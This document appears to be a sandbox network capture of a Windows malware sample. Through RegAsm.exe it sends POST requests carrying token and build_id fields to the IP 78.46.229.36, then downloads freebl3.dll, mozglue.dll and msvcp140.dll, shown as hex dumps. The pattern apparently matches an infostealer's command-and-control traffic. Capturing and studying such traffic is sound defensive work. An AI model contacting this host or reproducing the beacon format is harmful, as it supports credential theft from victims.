Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:37 UTC	310	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAKJDHIEBFIIDGDGDBAE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 08:15:37 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 33 39 34 36 65 39 64 64 66 39 31 66 62 33 30 63 32 35 63 39 62 33 37 37 35 35 35 38 31 32 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 37 65 32 62 37 37 35 32 32 64 30 61 39 32 66 66 64 37 35 33 36 37 31 62 30 63 37 30 38 36 39 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 45 0d 0a 43 6f 6e 74 Data Ascii: ------DAKJDHIEBFIIDGDGDBAEContent-Disposition: form-data; name="token"373946e9ddf91fb30c25c9b377555812------DAKJDHIEBFIIDGDGDBAEContent-Disposition: form-data; name="build_id"27e2b77522d0a92ffd753671b0c70869------DAKJDHIEBFIIDGDGDBAECont
2024-03-28 08:15:38 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 08:15:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 08:15:38 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49832	78.46.229.36	443	6284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:38 UTC	310	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJKJJEGIDBGIDGCBAFHC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 08:15:38 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 33 39 34 36 65 39 64 64 66 39 31 66 62 33 30 63 32 35 63 39 62 33 37 37 35 35 35 38 31 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 37 65 32 62 37 37 35 32 32 64 30 61 39 32 66 66 64 37 35 33 36 37 31 62 30 63 37 30 38 36 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 Data Ascii: ------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="token"373946e9ddf91fb30c25c9b377555812------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="build_id"27e2b77522d0a92ffd753671b0c70869------KJKJJEGIDBGIDGCBAFHCCont
2024-03-28 08:15:39 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 08:15:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 08:15:39 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49835	78.46.229.36	443	6284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:39 UTC	205	OUT	GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Cache-Control: no-cache
2024-03-28 08:15:40 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 08:15:40 GMT Content-Type: application/octet-stream Content-Length: 685392 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-a7550" Accept-Ranges: bytes
2024-03-28 08:15:40 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
2024-03-28 08:15:40 UTC	16384	IN	Data Raw: 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 01 89 5d 9c 8b 45 b8 03 85 30 ff ff ff 8b Data Ascii: }1M1XM}}UU1M1UM] EH]EE\|1E1EMMuuU1M1Mu]uM11U\|uuMM1]1x]E0
2024-03-28 08:15:40 UTC	16384	IN	Data Raw: 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 07 00 83 c4 04 89 45 e8 ff 77 1c e8 42 90 Data Ascii: M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wPEwB
2024-03-28 08:15:40 UTC	16384	IN	Data Raw: 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f a3 d6 73 3b 8b 75 18 83 fe 02 73 33 8b 7d Data Ascii: 0C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwEs;us3}
2024-03-28 08:15:40 UTC	16384	IN	Data Raw: 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 cb 89 4d f0 8d 14 3e 81 c2 31 23 43 e4 0f Data Ascii: ^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?UuM>1#C
2024-03-28 08:15:40 UTC	16384	IN	Data Raw: 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 00 77 12 31 c0 81 f9 00 01 00 00 0f 93 c0 Data Ascii: }EPYEPYEPYFMPQW\|EppEPH[FMPQuo=EppEPN@w,0w w1
2024-03-28 08:15:40 UTC	16384	IN	Data Raw: 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 85 7c ff ff ff 00 00 00 00 c7 85 6c ff ff Data Ascii: $`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE\|l
2024-03-28 08:15:40 UTC	16384	IN	Data Raw: 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 f7 65 f0 89 95 28 ff ff ff 89 85 30 ff ff Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
2024-03-28 08:15:40 UTC	16384	IN	Data Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
2024-03-28 08:15:40 UTC	16384	IN	Data Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff Data Ascii: 0<48%8A)$(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49839	78.46.229.36	443	6284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:43 UTC	205	OUT	GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Cache-Control: no-cache
2024-03-28 08:15:44 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 08:15:43 GMT Content-Type: application/octet-stream Content-Length: 608080 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-94750" Accept-Ranges: bytes
2024-03-28 08:15:44 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49843	78.46.229.36	443	6284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:15:44 UTC	206	OUT	GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Cache-Control: no-cache
2024-03-28 08:15:45 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 08:15:44 GMT Content-Type: application/octet-stream Content-Length: 450024 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-6dde8" Accept-Ranges: bytes
2024-03-28 08:15:45 UTC	16138	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
2024-03-28 08:15:45 UTC	16384	IN	Data Raw: 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 00 2d 00 69 00 6e 00 00 00 6d 00 73 00 2d Data Ascii: hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-
2024-03-28 08:15:45 UTC	16384	IN	Data Raw: 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c8 8b 00 10 00 Data Ascii: {\|L@DX}0}}M@4}0}}4M@tXM}0}}XM@
2024-03-28 08:15:45 UTC	16384	IN	Data Raw: c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd e2 df e0 dd da f6 c4 44 7b 49 d9 c2 d8 c1 Data Ascii: E]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u\|_E^UQQMuU]EDB]ED{nt]B]ED{I
2024-03-28 08:15:45 UTC	16384	IN	Data Raw: f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 02 83 6d d4 01 75 ec 8b c2 85 c0 74 26 3b Data Ascii: f;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90utmut&;
